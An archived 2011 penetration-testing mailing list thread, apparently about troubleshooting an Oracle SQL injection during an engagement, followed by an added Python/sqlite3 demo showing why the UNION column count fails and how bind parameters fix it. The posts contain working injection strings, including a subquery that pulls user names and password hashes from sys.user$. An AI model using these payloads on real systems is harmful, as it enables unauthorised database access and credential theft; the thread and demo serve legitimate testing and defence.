Penetration Testing mailing list archives

Re: Oracle Pentest


From: Dan Crowley <dcrowley () coresecurity com>
Date: Mon, 03 Jan 2011 14:35:12 -0500

This could be a result of your injection string being loaded into
multiple queries, for which there are varying numbers of columns being
selected. There are two options I can think of:

1) Concatenate the column with the results of a subquery, like so:
' || (select rownum ROW, name || '-' || password from sys.user$ where
type#=1 and ROW = 1) || '

2) Use blind SQL injection techniques or, given verbose errors (which
I'm assuming aren't being given to you, otherwise you'd not have to try
to determine the number of columns) use failed conversions to produce
errors like "Sorry, can't turn (value from database) into an integer for
you"

Hope this helps!

PS http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/
--
Daniel Crowley, CICP, GCIH
Technical Specialist
Core Security Technologies

"All the forces in the world are not so powerful as an idea whose time
has come." - Victor Hugo

On 1/1/2011 7:48 AM, maash.rajani () gmail com wrote:
I found an injection point during a pentest project.
They are running an Oracle DBMS. 

Simply trying ' OR '1'='1' returned one single result. In trying to find the number of queries returned by the column 
I used:

' OR '1'='1' ORDER BY n--
Anything above 7 in the Order by query generates an error. So I assumed there were 7 columns being selected.

But then when I try 
' OR '1'='1' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --

I get an incorrect number of columns error. I tried anywhere up to 30 "NULLs", I keep getting the same error.

Any suggestions?

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT 
and CEPT certs require a full practical examination in order to become certified. 

http://www.iacertification.org
------------------------------------------------------------------------
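
Added example, not part of either post: a Python/sqlite3 reproduction of the situation the reply hypothesises, showing why no single NULL count satisfies every statement and that binding the value closes the injection point. The table, the handler that feeds one value into a 7-column and a 9-column statement, and all names are constructed assumptions; SQLite stands in for Oracle, so there is no FROM DUAL.

```python
import sqlite3

COLS = ["c%d" % i for i in range(1, 10)]  # constructed schema: c1..c9

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (%s)" % ", ".join(COLS))
    db.execute("INSERT INTO items VALUES ('widget', 2, 3, 4, 5, 6, 7, 8, 9)")
    return db

# Hypothetical handler: one request value feeds two statements that select
# 7 and 9 columns respectively.
SELECTS = ["SELECT %s FROM items WHERE c1 = " % ", ".join(COLS[:n]) for n in (7, 9)]

def run_concatenated(db, value):
    """Vulnerable form: value is pasted into the SQL text of both statements."""
    results = []
    for select in SELECTS:
        try:
            results.append(len(db.execute(select + "'" + value + "'").fetchall()))
        except sqlite3.Error as exc:
            results.append("error: %s" % exc)
    return results

def run_bound(db, value):
    """Corrected form: value is passed as a bind parameter and stays data."""
    return [len(db.execute(select + "?", (value,)).fetchall()) for select in SELECTS]

def nulls(n):
    """The thread's UNION test string with n NULLs (no FROM DUAL in SQLite)."""
    return "' OR '1'='1' UNION SELECT " + ",".join(["NULL"] * n) + " --"

if __name__ == "__main__":
    db = make_db()
    for value in ("widget", "' OR '1'='1' ORDER BY 7--", nulls(7), nulls(9)):
        # Per-statement outcome: row count, or the driver's error text.
        print(repr(value), run_concatenated(db, value), run_bound(db, value))
```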

